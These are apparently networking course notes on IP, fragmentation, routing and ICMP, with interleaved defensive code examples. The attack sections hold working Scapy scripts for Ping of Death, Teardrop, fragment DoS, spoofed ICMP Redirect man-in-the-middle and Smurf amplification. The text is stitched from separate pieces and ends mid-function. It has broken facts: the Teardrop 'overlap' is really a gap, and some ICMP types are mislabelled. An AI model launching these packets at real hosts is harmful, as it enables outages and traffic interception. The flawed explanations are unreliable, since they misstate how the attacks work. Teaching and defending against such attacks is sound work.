CHAPTER 8: NETWORK LAYER - IP - ICMP AND ATTACKS
PART 1: NETWORK LAYER - BASIC CONCEPTS
1. ROLE & FUNCTION
Transports segments from the sending host to the receiving host:
Sender: - Encapsulates segments into datagrams - Passes them to the link layer
Receiver: - Delivers segments to the transport layer protocol
Network layer protocols: - Present in EVERY Internet device: hosts, routers
Routers: - Examine the header fields of all IP datagrams - Move datagrams from input ports to output ports - Transfer datagrams along the end-to-end path
2. TWO MAIN FUNCTIONS
A. FORWARDING
Definition: - Local, per-router function - Move packets from the router's input link to the appropriate output link
Analogy: - The process of getting through a single interchange
B. ROUTING
Definition: - Network-wide logic - Determines the route taken by packets from source to destination - Uses routing algorithms
Analogy: - The process of planning a trip from source to destination
3. DATA PLANE VS CONTROL PLANE
A. DATA PLANE
Characteristics: - Local, per-router function - Determines how a datagram arriving on a router input port is forwarded to a router output port - Uses the forwarding table
B. CONTROL PLANE
Characteristics: - Network-wide logic - Determines how a datagram is routed among routers along the end-to-end path
Two approaches:
1. Traditional routing algorithms: - Implemented IN routers - Routing algorithm components in every router - Interact in the control plane
2. Software-Defined Networking (SDN): - Implemented in REMOTE servers - A remote controller computes and installs the forwarding tables in the routers - Centralized control
PART 2: IP PROTOCOL
1. IP DATAGRAM FORMAT
Header structure (20 bytes minimum):
[Ver | IHL | ToS | Total Length]
[Identification | Flags | Fragment Offset]
[TTL | Protocol | Header Checksum]
[Source IP Address]
[Destination IP Address]
[Options (if any)]
[Payload Data]
Important fields:
A. VERSION (4 bits)
- IP protocol version number
- IPv4 = 4
B. IHL - HEADER LENGTH (4 bits)
- Header length in 32-bit words
- Typically = 5 (5 × 4 = 20 bytes)
C. TYPE OF SERVICE (8 bits)
- DiffServ (bits 0:5)
- ECN (bits 6:7)
D. TOTAL LENGTH (16 bits)
- Total datagram length in bytes
- Maximum: 65,535 bytes (64KB)
- Typically: 1500 bytes or less
- Question: Can we overflow this value? → Attacks!
E. IDENTIFICATION (16 bits)
- Unique ID for each datagram
- Used for fragmentation/reassembly
F. FLAGS (3 bits)
- Bit 0: Reserved (must be 0)
- Bit 1: DF (Don't Fragment)
- Bit 2: MF (More Fragments)
G. FRAGMENT OFFSET (13 bits)
- Position of the fragment within the original datagram
- Unit: 8-byte blocks
- Why ÷ 8? To save bits!
H. TIME-TO-LIVE (TTL) (8 bits)
- Remaining max hops
- Decremented at each router
- When TTL = 0 → the router drops the packet and sends ICMP Time Exceeded
I. PROTOCOL (8 bits)
- Upper layer protocol
- 6 = TCP
- 17 = UDP
- 1 = ICMP
J. HEADER CHECKSUM (16 bits)
- Error detection for the header only (NOT the payload)
K. SOURCE IP ADDRESS (32 bits)
- Sender's IP
L. DESTINATION IP ADDRESS (32 bits)
- Receiver's IP
M. OPTIONS (variable)
- Timestamp, record route taken, etc.
Overhead: - 20 bytes IP + 20 bytes TCP = 40 bytes + app layer overhead
2. TTL AND TRACEROUTE
TTL (Time To Live): - Purpose: prevent infinite loops - Decremented at each router - When TTL = 0 → the router drops the packet and sends ICMP Type 11 Code 0 (Time Exceeded)
How traceroute works:
Steps:
1. The source sends sets of UDP segments to the destination: - 1st set: TTL = 1 - 2nd set: TTL = 2 - 3rd set: TTL = 3, etc.
2. The datagram in the nth set arrives at the nth router: - The router discards the datagram - It sends the source an ICMP message (Type 11, Code 0) - The ICMP message includes the name of the router & its IP address
3. When the ICMP message arrives at the source: - Record RTTs (Round Trip Times)
Stopping criteria: - A UDP segment arrives at the destination host - The destination returns ICMP "port unreachable" (Type 3, Code 3) - The source stops
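The exchange above as a runnable model (an added example, not code from the original notes): each router decrements TTL and answers Type 11/0 when it hits zero, and the destination answers Type 3/3 for a closed UDP port. The names Router, Destination and traceroute, and the sample addresses, are assumptions of this example.

```python
# Added example (not from the original notes): a model of the traceroute
# exchange. Routers and the destination are constructed objects; nothing is
# put on the wire. Router, Destination and traceroute are assumed names.
ICMP_TIME_EXCEEDED = (11, 0)    # router: TTL reached 0, probe discarded
ICMP_PORT_UNREACHABLE = (3, 3)  # destination: no UDP listener on the probe port


class Router:
    """One hop on the path. Decrements TTL; at 0 it drops the datagram and
    answers the source with ICMP Type 11 Code 0."""

    def __init__(self, addr):
        self.addr = addr

    def handle(self, ttl):
        ttl -= 1
        if ttl == 0:
            return ("drop", self.addr, ICMP_TIME_EXCEEDED)
        return ("forward", ttl, None)


class Destination:
    """The probed host. Traceroute aims at a UDP port that is not listening,
    so the reply is ICMP Type 3 Code 3 (port unreachable)."""

    def __init__(self, addr, listening_ports=()):
        self.addr = addr
        self.listening_ports = set(listening_ports)

    def handle(self, dport):
        if dport in self.listening_ports:
            return ("delivered", self.addr, None)   # silent: no ICMP at all
        return ("drop", self.addr, ICMP_PORT_UNREACHABLE)


def traceroute(routers, dest, dport=33434, max_ttl=30):
    """Send one probe per TTL value and record who answered.

    Returns [(ttl, responder_ip, (icmp_type, icmp_code)), ...]. Stops when the
    destination answers 3/3, when a probe is silently delivered, or at max_ttl.
    """
    hops = []
    for ttl in range(1, max_ttl + 1):
        remaining = ttl
        answer = None
        for router in routers:
            verdict, value, icmp = router.handle(remaining)
            if verdict == "drop":
                answer = (value, icmp)
                break
            remaining = value
        if answer is None:                      # probe survived every router
            _, addr, icmp = dest.handle(dport)
            answer = (addr, icmp)
        hops.append((ttl, answer[0], answer[1]))
        if answer[1] in (ICMP_PORT_UNREACHABLE, None):
            break
    return hops


# Constructed topology: three routers between the source and 10.0.3.5.
SAMPLE_PATH = [Router("10.0.0.1"), Router("10.0.1.1"), Router("10.0.2.1")]
SAMPLE_DEST = Destination("10.0.3.5", listening_ports={53})

if __name__ == "__main__":
    for ttl, who, icmp in traceroute(SAMPLE_PATH, SAMPLE_DEST):
        print(f"TTL={ttl:2d}  {who:<10}  ICMP {icmp}")
```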
PART 3: IP FRAGMENTATION
1. CONCEPT
Why is fragmentation needed? - Network links have an MTU (Max Transfer Size): the largest possible link-level frame - Different link types have different MTUs - Example: Ethernet = 1500 bytes
Process: - A large IP datagram is divided ("fragmented") within the network - One datagram → several datagrams - Reassembled ONLY at the destination (NOT at intermediate routers!) - IP header bits are used to identify and order related fragments
2. FRAGMENTATION EXAMPLE
Scenario: 4000-byte datagram, MTU = 1500 bytes
Original datagram:
ID = x
Offset = 0
Flag = 0
Length = 4000 (20-byte header + 3980 bytes of data)
After fragmentation:
Fragment 1:
ID = x
Offset = 0
Flag = 1 (More Fragments)
Length = 1500
Data = 1480 bytes (1500 - 20 header)
Fragment 2:
ID = x
Offset = 185
Flag = 1 (More Fragments)
Length = 1500
Data = 1480 bytes
Fragment 3:
ID = x
Offset = 370
Flag = 0 (Last Fragment)
Length = 1040
Data = 1020 bytes (3980 - 1480 - 1480)
Note: - Offset = data_bytes ÷ 8 - Fragment 1: offset = 0 - Fragment 2: offset = 1480 ÷ 8 = 185 - Fragment 3: offset = (1480 + 1480) ÷ 8 = 370
Why offset ÷ 8? - The Offset field has only 13 bits - Max value = 8191 - Without ÷ 8 → only 8191 bytes could be addressed - With ÷ 8 → 8191 × 8 = 65,528 bytes can be addressed (nearly 64KB)
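The fragmentation arithmetic above as code (an added example, not code from the original notes): it splits a datagram for a given MTU, keeping every non-final fragment a multiple of 8 data bytes so the offset field can express it, and reproduces the 4000-byte / MTU 1500 case. The names fragment_plan and reassembled_length are assumptions of this example.

```python
# Added example (not from the original notes): the fragmentation arithmetic
# above as code. fragment_plan and reassembled_length are assumed names.
IP_HEADER_LEN = 20
MAX_DATAGRAM = 65535            # 16-bit Total Length field


def fragment_plan(total_length, mtu, ip_id, header_len=IP_HEADER_LEN):
    """Split a datagram of total_length bytes for a link with the given MTU.

    Returns one dict per fragment with the header fields the notes discuss:
    id, offset (in 8-byte units), the MF flag, Total Length and data bytes.
    """
    if total_length > MAX_DATAGRAM:
        raise ValueError("datagram exceeds the 16-bit Total Length limit")
    payload = total_length - header_len
    # Every non-final fragment must carry a multiple of 8 data bytes, because
    # Fragment Offset is counted in 8-byte blocks: round the MTU payload down.
    per_fragment = (mtu - header_len) // 8 * 8
    if per_fragment <= 0:
        raise ValueError("MTU too small to carry any data")
    fragments, sent = [], 0
    while sent < payload:
        data = min(per_fragment, payload - sent)
        fragments.append({
            "id": ip_id,
            "offset": sent // 8,                 # sent is always a multiple of 8
            "mf": 1 if sent + data < payload else 0,
            "total_length": header_len + data,
            "data_bytes": data,
        })
        sent += data
    return fragments


def reassembled_length(fragments, header_len=IP_HEADER_LEN):
    """Size the destination ends up with: header + end of the furthest fragment."""
    last = max(fragments, key=lambda f: f["offset"])
    return header_len + last["offset"] * 8 + last["data_bytes"]


if __name__ == "__main__":
    for fragment in fragment_plan(4000, 1500, ip_id=0x1234):
        print(fragment)
```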
3. CONSTRUCTING IP FRAGMENTS WITH SCAPY
```python
from scapy.all import *

# Fragment 1: carries the UDP header plus the first 1000 data bytes.
# MF set (flags=1), offset 0, same id as the second fragment.
ip1 = IP(dst="10.9.0.5", id=1000, flags=1, frag=0, proto=17)
# The UDP length covers the whole reassembled datagram (8 + 1000 + 500);
# the checksum is zeroed (optional over IPv4) because Scapy would otherwise
# compute it over this fragment alone.
udp = UDP(sport=7070, dport=9090, len=1508, chksum=0)
data1 = b"A" * 1000
pkt1 = ip1/udp/data1

# Fragment 2: last fragment (flags=0). Fragment 1's IP payload is
# 8 + 1000 = 1008 bytes, so the offset is 1008 / 8 = 126 (8-byte units).
ip2 = IP(dst="10.9.0.5", id=1000, flags=0, frag=126, proto=17)
data2 = b"B" * 500
pkt2 = ip2/Raw(load=data2)

send(pkt1)
send(pkt2)
```
Explanation: - flags = 1: More Fragments - flags = 0: last fragment - frag = offset in 8-byte units, counted from the start of the IP payload - proto = 17: UDP - id must be the same for all fragments
PART 4: ATTACKS USING IP FRAGMENTATION
1. PROTOCOL VIOLATION
Concept: - Protocols are rules - Attackers like to break rules - Robust programs must handle rule violations
Attack questions:
Q1: Can you create an IP packet larger than 65,536 bytes (64KB)?
Q2: Can you create abnormal conditions using the offset and payload size?
Q3: Can you use a small amount of bandwidth to tie up significant resources on the target?
2. PING OF DEATH (PoD) ATTACK
Attack 1: Create a super-large packet
Idea: Violate the IP protocol → buffer overflow
Method: - The last fragment has: - offset = (65536 - 8) ÷ 8 = 8191 - total_length = 1000
Calculation:
Real size = offset × 8 + (total_length - 20 - 8)
= 65528 + 972
= 66,500 bytes > 65,536 bytes!
Result: - Exceeds the max IP packet size - Causes a buffer overflow at the victim - System crash
Code example:
```python
from scapy.all import *
# Create super-large packet
ip = IP(dst="victim_ip")
icmp = ICMP()
# Last fragment
ip_frag = IP(dst="victim_ip", id=12345, flags=0, frag=8191)
payload = "X" * 1000
pkt = ip_frag/ICMP()/payload
send(pkt)
```
Recent PoD vulnerability: - CVE-2020-16898 (Windows TCP/IP Stack) - ICMPv6 Router Advertisement packets - Remote Code Execution!
Mitigation: - Validate the total reassembled packet size - Drop packets exceeding the limits - Update/patch systems
3. TEARDROP ATTACK
Attack 2: Create abnormal situations
Goal: Test whether the computer can handle overlapping fragments
Normal fragments: Fragment 1: offset = 0, 820 bytes of data; Fragment 2: offset = 200
Check:
End of Fragment 1 = 0 + 820 = 820
Start of Fragment 2 = 200 × 8 = 1600
Gap = 1600 - 820 = 780 bytes → OK!
Teardrop attack: Fragment 1: offset = 0, 820 bytes of data; Fragment 2: offset = 600
Check:
End of Fragment 1 = 0 + 820 = 820
Start of Fragment 2 = 600 × 8 = 4800
Overlap = 820 - 4800 = -3980 (NEGATIVE!)
Result: - Negative overlap → HUGE unsigned value - Cannot reassemble - System crash or unexpected behavior
Code:
```python
from scapy.all import *
# Fragment 1
ip1 = IP(dst="victim", id=1000, flags=1, frag=0)
data1 = "A" * 800
pkt1 = ip1/ICMP()/data1
# Fragment 2 - OVERLAPPING!
ip2 = IP(dst="victim", id=1000, flags=0, frag=600)
data2 = "B" * 800
pkt2 = ip2/Raw(load=data2)
send(pkt1)
send(pkt2)
```
4. DENIAL OF SERVICE (DoS) WITH FRAGMENTATION
Attack 3: Tie up the target's resources
Idea: Small bandwidth → significant resources
Method: - Send only the first fragment (offset 0) and a last fragment with a huge offset - The middle fragments are never sent
Impact:
Approach 1 (static buffer): - The target allocates a 64KB buffer while waiting for all fragments - Send 2 tiny packets (~100 bytes each) - Tie up 64KB of resources on the server!
Approach 2 (linked list): - More complicated, takes time to implement - Still consumes resources
Result: - Very efficient DoS attack - Small bandwidth → large resource consumption
Code:
```python
from scapy.all import *
# Fragment 1 - first
ip1 = IP(dst="victim", id=1000, flags=1, frag=0)
pkt1 = ip1/ICMP()/"A"*50
# Fragment 2 - last (huge offset!)
ip2 = IP(dst="victim", id=1000, flags=0, frag=8190)
pkt2 = ip2/Raw(load="B"*50)
send(pkt1)
send(pkt2)
# Target allocates 64KB buffer, waits forever for middle fragments!
```
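The receiver-side checks that the three attacks above (Ping of Death, Teardrop, fragment DoS) depend on being absent, as an added example that is not code from the original notes: a per-set validator that flags oversize, overlapping, unaligned and incomplete fragment sets, and a bounded reassembly queue with a timer so a never-completed set cannot hold a buffer forever. The checker counts the whole IP payload, so the notes' last PoD fragment ends at byte 66,508 (the notes' arithmetic also subtracts the 8-byte ICMP header and gets 66,500; both exceed the limit); check_fragment_set, ReassemblyQueue and the sample sets are assumptions of this example.

```python
# Added example (not from the original notes): receiver-side validation of
# fragment sets. Each fragment is a dict with offset (8-byte units), mf,
# total_length (incl. IP header) and optionally ihl. Names are assumed here.
MAX_DATAGRAM = 65535
IP_HEADER_LEN = 20
FATAL = {"oversize", "overlap", "bad-length", "unaligned"}   # never buffer these


def fragment_span(frag):
    """Byte range [start, end) this fragment covers in the reassembled payload."""
    start = frag["offset"] * 8
    return start, start + frag["total_length"] - frag.get("ihl", IP_HEADER_LEN)


def check_fragment_set(frags):
    """Validate one reassembly set (same id/src/dst/protocol).

    Returns a list of problem names; [] means the set is complete and well formed.
    """
    if not frags:
        return ["empty"]
    problems, prev_end = [], 0
    for f in sorted(frags, key=lambda f: f["offset"]):
        start, end = fragment_span(f)
        if end < start:
            problems.append("bad-length")      # Total Length below the IP header
            continue
        if IP_HEADER_LEN + end > MAX_DATAGRAM:
            problems.append("oversize")        # Ping of Death: > 65,535 bytes
        if start < prev_end:
            problems.append("overlap")         # Teardrop-style overlap
        elif start > prev_end:
            problems.append("hole")            # data still missing before this one
        if f["mf"] and (end - start) % 8:
            problems.append("unaligned")       # non-final fragments carry 8n bytes
        prev_end = max(prev_end, end)
    if max(frags, key=lambda f: f["offset"])["mf"]:
        problems.append("incomplete")          # no last fragment (MF=0) seen yet
    return problems


class ReassemblyQueue:
    """Bound what a sender can tie up with fragment sets that never complete."""

    def __init__(self, max_pending_sets=64, timeout=30.0):
        self.max_pending_sets = max_pending_sets
        self.timeout = timeout      # seconds a set may wait for its missing pieces
        self.pending = {}           # (src, dst, id) -> [first_seen, fragments]

    def add(self, key, frag, now):
        """Return 'rejected', 'dropped', 'waiting' or 'complete'."""
        for k in [k for k, (t, _) in self.pending.items() if now - t > self.timeout]:
            del self.pending[k]                # reclaim buffers held past the timer
        if key not in self.pending:
            if len(self.pending) >= self.max_pending_sets:
                return "dropped"               # no buffer for a new set: fail closed
            self.pending[key] = [now, []]
        self.pending[key][1].append(frag)
        problems = check_fragment_set(self.pending[key][1])
        if FATAL & set(problems):
            del self.pending[key]
            return "rejected"
        if problems:
            return "waiting"                   # hole/incomplete: hold until timeout
        del self.pending[key]
        return "complete"


# Constructed sets; total_length includes the 20-byte IP header.
POD_LAST = {"offset": 8191, "mf": 0, "total_length": 1000}          # ends at 66,508
OVERLAPPING = [{"offset": 0, "mf": 1, "total_length": 844},          # bytes 0..824
               {"offset": 50, "mf": 0, "total_length": 820}]         # starts at 400
DOS_PAIR = [{"offset": 0, "mf": 1, "total_length": 76},
            {"offset": 8000, "mf": 0, "total_length": 70}]           # middle never sent
VALID_4000 = [{"offset": 0, "mf": 1, "total_length": 1500},
              {"offset": 185, "mf": 1, "total_length": 1500},
              {"offset": 370, "mf": 0, "total_length": 1040}]
```

The timeout and set limit are the knobs that defeat the two-packet DoS: a real stack additionally caps total buffered bytes rather than only the number of sets.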
PART 5: ROUTING
1. ROUTING TABLE
Linux routing commands:
Show routing table: ip route
Add route: sudo ip route add <destination> via <gateway>
Delete route: sudo ip route del <destination>
2. ROUTING RULES - LONGEST MATCH
Example routing table:
A: 0.0.0.0/0 dev interface-a (default route)
B: 192.168.0.0/16 dev interface-b
C: 192.168.60.0/24 dev interface-a
D: 192.168.60.5/32 dev interface-d
Question: Which interface is used for:
1. 192.200.60.5? - Match: A (0.0.0.0/0) - Answer: interface-a (default route)
2. 192.168.30.5? - Match: A (0.0.0.0/0), B (192.168.0.0/16) - Longest match: B (/16 > /0) - Answer: interface-b
3. 192.168.60.5? - Match: A (0.0.0.0/0), B (192.168.0.0/16), C (192.168.60.0/24), D (192.168.60.5/32) - Longest match: D (/32 > /24 > /16 > /0) - Answer: interface-d
Bottom line: Pick the LONGEST MATCH!
3. ROUTING TABLE CONFIGURATION
For routers: - Routing protocols (e.g., OSPF, BGP) - Attacks on routing protocols (will be discussed)
For hosts (tiny routing table): - DHCP (IP, DNS, router info) - Default routers - Manual configuration (static routes) - ICMP redirect messages
4. REVERSE PATH FILTERING (RPF)
Threat: Spoofing from outside the network - An outside attacker uses an internal source IP - Pretending to be inside → cause damage
Router's protection: RPF
Symmetric routing: 1. Router R receives a packet on interface A 2. Do a reverse lookup: does the return path to src_ip go out through the same interface A? - YES → Allow (symmetric) - NO → Drop (asymmetric)
Related term: Reverse-Path Forwarding (RPF)
Note: - A very obscure and important rule inside the Linux kernel - Provides protection against packet spoofing
Demo - a spoofed packet that RPF will drop:
```python
from scapy.all import *
# Spoofed packet from outside carrying an internal source IP
ip = IP(src="10.0.2.5", dst="192.168.60.5")  # internal src, external dst
send(ip/ICMP())
# The router drops it: the reverse path to 10.0.2.5 does not match the incoming interface!
```
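Longest-prefix lookup for the example table above plus the strict reverse-path check the RPF section describes, as an added example that is not code from the original notes. RoutingTable, rpf_check and the constructed border-router table (10.0.2.0/24 inside on eth1, everything else via eth0) are assumptions of this example.

```python
# Added example (not from the original notes): longest-prefix match and a
# strict reverse-path check. RoutingTable, rpf_check and BORDER are assumed.
import ipaddress


class RoutingTable:
    """Longest-prefix match: the most specific route containing the address wins."""

    def __init__(self, routes):
        # routes: [(prefix, interface)], e.g. ("192.168.60.0/24", "interface-a")
        self.routes = [(ipaddress.ip_network(p), dev) for p, dev in routes]

    def lookup(self, addr):
        ip = ipaddress.ip_address(addr)
        best = None
        for net, dev in self.routes:
            if ip in net and (best is None or net.prefixlen > best[0].prefixlen):
                best = (net, dev)
        return None if best is None else best[1]

    def matches(self, addr):
        """Every route that matches, most specific first (the notes' 'Match:' lists)."""
        ip = ipaddress.ip_address(addr)
        return sorted(((str(n), d) for n, d in self.routes if ip in n),
                      key=lambda r: -ipaddress.ip_network(r[0]).prefixlen)


def rpf_check(table, src_ip, in_iface):
    """Strict reverse path filtering (Linux: net.ipv4.conf.all.rp_filter=1):
    accept only if the route back to src_ip leaves via the arrival interface."""
    return table.lookup(src_ip) == in_iface


# The notes' example table
PAGE_TABLE = RoutingTable([
    ("0.0.0.0/0", "interface-a"),
    ("192.168.0.0/16", "interface-b"),
    ("192.168.60.0/24", "interface-a"),
    ("192.168.60.5/32", "interface-d"),
])

# Constructed border router: 10.0.2.0/24 is the inside network on eth1,
# everything else is reached via eth0 (outside).
BORDER = RoutingTable([("0.0.0.0/0", "eth0"), ("10.0.2.0/24", "eth1")])

if __name__ == "__main__":
    for dst in ("192.200.60.5", "192.168.30.5", "192.168.60.5"):
        print(dst, "->", PAGE_TABLE.lookup(dst), PAGE_TABLE.matches(dst))
    print("spoofed 10.0.2.5 on eth0 allowed?", rpf_check(BORDER, "10.0.2.5", "eth0"))
```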
PART 6: ICMP PROTOCOL
1. PURPOSE
ICMP (Internet Control Message Protocol): - Used by hosts and routers to communicate network-level information
Functions:
Error reporting: - Unreachable host, network, port, protocol - Time exceeded (TTL = 0)
Control messages: - Echo request/reply (ping) - Redirect - Timestamp request/reply - Router advertisement/solicitation
Characteristics: - ICMP messages are carried in IP datagrams - ICMP message: type, code + the first 8 bytes of the IP datagram that caused the error
2. ICMP MESSAGE TYPES
Important types:
| Type | Code | Description |
|---|---|---|
| 0 | 0 | Echo Reply (ping) |
| 3 | 0 | Dest Network Unreachable |
| 3 | 1 | Dest Host Unreachable |
| 3 | 2 | Dest Protocol Unreachable |
| 3 | 3 | Dest Port Unreachable |
| 3 | 6 | Dest Network Unknown |
| 3 | 7 | Dest Host Unknown |
| 4 | 0 | Source Quench (congestion - deprecated) |
| 8 | 0 | Echo Request (ping) |
| 9 | 0 | Router Advertisement |
| 10 | 0 | Router Discovery |
| 11 | 0 | TTL Expired |
| 12 | 0 | Bad IP Header |
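Building and parsing the messages in the table above, as an added example that is not code from the original notes: the RFC 1071 ones'-complement checksum shared by the IP and ICMP headers, an Echo Request, and a Type 11 Time Exceeded message that quotes the offending IP header plus the first 8 bytes of its payload (RFC 792), which is what lets traceroute match the reply to its UDP probe. The names inet_checksum, build_icmp, parse_icmp, build_ipv4, time_exceeded, echo_request and the constructed probe are assumptions of this example.

```python
# Added example (not from the original notes): ICMP message construction and
# parsing with the Internet checksum. All function names are assumed here.
import socket
import struct


def inet_checksum(data):
    """RFC 1071 ones'-complement sum of 16-bit words; 0 over a valid message."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:                       # fold the carries back in
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def build_icmp(icmp_type, code, rest=0, payload=b""):
    """Type(1) Code(1) Checksum(2) rest-of-header(4) followed by the payload."""
    header = struct.pack("!BBHI", icmp_type, code, 0, rest)
    csum = inet_checksum(header + payload)   # checksum covers the whole message
    return struct.pack("!BBHI", icmp_type, code, csum, rest) + payload


def parse_icmp(msg):
    if len(msg) < 8:
        raise ValueError("ICMP message shorter than its 8-byte header")
    icmp_type, code, _, rest = struct.unpack("!BBHI", msg[:8])
    return {"type": icmp_type, "code": code, "rest": rest,
            "payload": msg[8:], "checksum_ok": inet_checksum(bytes(msg)) == 0}


def build_ipv4(src, dst, proto, payload, ttl=64, ident=1):
    """Minimal 20-byte IPv4 header (IHL=5, no options) in front of payload."""
    total = 20 + len(payload)
    head = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total, ident, 0, ttl, proto, 0,
                       socket.inet_aton(src), socket.inet_aton(dst))
    csum = inet_checksum(head)               # header-only checksum, as the notes say
    return head[:10] + struct.pack("!H", csum) + head[12:] + payload


def time_exceeded(offending_datagram):
    """ICMP Type 11 Code 0 as a router sends it when TTL reaches 0: the quoted
    part is the offending IP header plus the first 8 bytes of its payload."""
    ihl = (offending_datagram[0] & 0x0F) * 4
    return build_icmp(11, 0, 0, offending_datagram[:ihl + 8])


def echo_request(ident, seq, data=b""):
    """Type 8 Code 0; identifier and sequence number share the rest-of-header."""
    return build_icmp(8, 0, (ident << 16) | seq, data)


# Constructed traceroute probe: UDP 7070 -> 33434 from 10.9.0.5 to 192.168.60.5
SAMPLE_PROBE = build_ipv4("10.9.0.5", "192.168.60.5", 17,
                          struct.pack("!HHHH", 7070, 33434, 8, 0), ttl=1)

if __name__ == "__main__":
    print(parse_icmp(echo_request(0x1234, 1, b"ping")))
    print(parse_icmp(time_exceeded(SAMPLE_PROBE)))
```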
3. ICMP ECHO REQUEST/REPLY (PING)
Workflow: the host sends an Echo Request (Type 8, Code 0) → the target answers with an Echo Reply (Type 0, Code 0)
Scapy:
```python
from scapy.all import *

# Echo Request
ip = IP(dst="10.9.0.5")
icmp = ICMP(type=8, code=0)
send(ip/icmp)

# Echo Reply
ip = IP(dst="10.9.0.6")
icmp = ICMP(type=0, code=0)
send(ip/icmp)
```
4. ICMP TIME EXCEEDED
When TTL = 0: - The router drops the packet - Sends ICMP Type 11, Code 0 (Time Exceeded) to the source - Includes the first 8 bytes of the original IP datagram
Used by traceroute!
5. ICMP DESTINATION UNREACHABLE
Type 3, various codes: - Code 0: Network Unreachable - Code 1: Host Unreachable - Code 2: Protocol Unreachable - Code 3: Port Unreachable (UDP port not listening)
6. ICMP REDIRECT
Purpose: Tell a host about a better route
Scenario:
Host A → Router R1 → Router R2 → Host B
R1 knows: Better route = direct to R2
R1 sends ICMP Redirect to A: "Use R2 for B"
ICMP Redirect message: - Type 5, Code 0 - Contains: the better gateway's IP address
Scapy:
```python
from scapy.all import *
ip = IP(src="10.9.0.11", dst="10.9.0.5")  # Router → Host
icmp = ICMP(type=5, code=0)
icmp.gw = "10.9.0.111"  # New gateway IP
# The redirect quotes the header of the datagram that triggered it
original_ip_header = IP(src="10.9.0.5", dst="192.168.60.5")/ICMP()
send(ip/icmp/original_ip_header)
```
Attacker → MITM attack using ICMP Redirect!
PART 7: ICMP REDIRECT ATTACK
1. ATTACK CODE
```python
#!/usr/bin/env python3
from scapy.all import *
# Victim: 10.9.0.5
# Fake gateway: 10.9.0.111 (attacker-controlled)
# Original gateway: 10.9.0.11
# Spoof ICMP Redirect from gateway to victim
ip = IP(src="10.9.0.11", dst="10.9.0.5")
icmp = ICMP(type=5, code=0)
icmp.gw = "10.9.0.111"  # Redirect to attacker
# Include original IP header (first 8 bytes of triggering packet)
# Victim was sending to some destination
orig_ip = IP(src="10.9.0.5", dst="192.168.60.5")
orig_icmp = ICMP()
send(ip/icmp/orig_ip/orig_icmp)
```
Result: - The victim updates its routing table - Traffic to 192.168.60.0/24 → goes through 10.9.0.111 (attacker) - MITM attack!
2. LIMITATIONS
Question 1: Can you launch an ICMP redirect from a remote computer?
Answer: NO! - When receiving an ICMP Redirect, the host checks whether the gateway is on the same network - If NOT → ignore
Question 2: Can you redirect to a remote computer?
Answer: NO! - Reverse Path Filtering (RPF) at the router will drop the spoofed packets - The new gateway must be on the same subnet
Bottom line: - ICMP Redirect only works locally (same LAN)
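The host-side acceptance rules behind the two limitations above, as an added example that is not code from the original notes: RFC 1122 says a redirect is silently discarded unless it comes from the current first-hop gateway for that destination and names a gateway on the directly attached subnet, and Linux additionally lets `net.ipv4.conf.all.accept_redirects` turn the feature off. HostRouting is an assumed name; the addresses are those of the attack scenario above.

```python
# Added example (not from the original notes): a host's checks on an incoming
# ICMP Redirect (Type 5 Code 0). HostRouting is an assumed name.
import ipaddress


class HostRouting:
    """A host's tiny routing table plus the RFC 1122 chec" for ICMP Redirect."""

    def __init__(self, my_ip, prefix_len, default_gw, accept_redirects=True):
        self.local_net = ipaddress.ip_interface(f"{my_ip}/{prefix_len}").network
        self.default_gw = ipaddress.ip_address(default_gw)
        self.accept_redirects = accept_redirects   # sysctl accept_redirects
        self.host_routes = {}                      # destination -> learned gateway

    def gateway_for(self, dst):
        return self.host_routes.get(ipaddress.ip_address(dst), self.default_gw)

    def handle_redirect(self, ip_src, new_gw, quoted_dst):
        """Apply a redirect, or return the reason it was ignored.

        ip_src     - source address of the IP datagram carrying the redirect
        new_gw     - gateway address in the ICMP header (icmp.gw in Scapy)
        quoted_dst - destination of the datagram quoted after the ICMP header
        """
        src, gw = ipaddress.ip_address(ip_src), ipaddress.ip_address(new_gw)
        dst = ipaddress.ip_address(quoted_dst)
        if not self.accept_redirects:
            return "ignored: redirects disabled"
        if src != self.gateway_for(dst):
            return "ignored: not sent by the current first-hop gateway"
        if gw not in self.local_net:
            return "ignored: new gateway is not on the local subnet"
        self.host_routes[dst] = gw                 # the notes' MITM outcome
        return None


if __name__ == "__main__":
    victim = HostRouting("10.9.0.5", 24, "10.9.0.11")
    print(victim.handle_redirect("10.9.0.11", "10.9.0.111", "192.168.60.5"))
    print("gateway for 192.168.60.5:", victim.gateway_for("192.168.60.5"))
    print(victim.handle_redirect("203.0.113.7", "10.9.0.111", "192.168.60.6"))
```

Setting accept_redirects to False is the usual hardening on hosts that are not meant to learn routes this way; the remaining two checks are what confine the attack to the local LAN.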
PART 8: DoS ATTACKS USING ICMP
1. SMURF ATTACK
Attack idea:
Step 1: Spoof an ICMP Echo Request - Source IP = victim's IP (spoofed!) - Destination = broadcast address (e.g., 10.9.0.255)
Step 2: All hosts on the network receive it - They think the victim sent the Echo Request - All reply to the victim with an Echo Reply!
Step 3: Victim overwhelmed - Receives hundreds/thousands of Echo Replies - Denial of Service!
Diagram:
Attacker → Spoofed Echo Request (src=Victim, dst=Broadcast)
→ All hosts on the network receive it
→ All hosts reply to the Victim
→ Victim OVERWHELMED!
Code:
```python
from scapy.all import *
# Smurf attack
ip = IP(src="victim_ip", dst="10.9.0.255")  # Broadcast
icmp = ICMP(type=8)  # Echo Request
send(ip/icmp)
# All hosts reply to victim!
```
Demo: Ping the broadcast address
Prevention: - Configure routers NOT to forward broadcast packets - Disable ICMP Echo Reply to broadcast addresses - Rate limiting
2. ICMP FLOODING
Attack: - Send a massive amount of ICMP Echo Requests - Overwhelm the victim's bandwidth/processing
Tools:
- hping3, ping with a high rate
Prevention: - Rate-limit ICMP - Firewall rules
3. RECONNAISSANCE
Using ICMP for network mapping: - Ping sweep: discover live hosts - Traceroute: map the network topology - ICMP Timestamp: get the system time
Tools:
- nmap -sn (ping scan)
- traceroute
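Detection logic for the three ICMP patterns above (Smurf trigger, Echo Reply flood, ping sweep) run over a constructed capture summary, as an added example that is not code from the original notes. analyse_icmp and constructed_capture are assumed names, and the thresholds are illustrative; a real deployment would tune them to the network's baseline.

```python
# Added example (not from the original notes): ICMP anomaly detection over
# (src, dst, type) records. analyse_icmp and constructed_capture are assumed.
import ipaddress
from collections import Counter, defaultdict

ECHO_REPLY, ECHO_REQUEST = 0, 8


def analyse_icmp(packets, local_net, sweep_threshold=8, reply_threshold=50):
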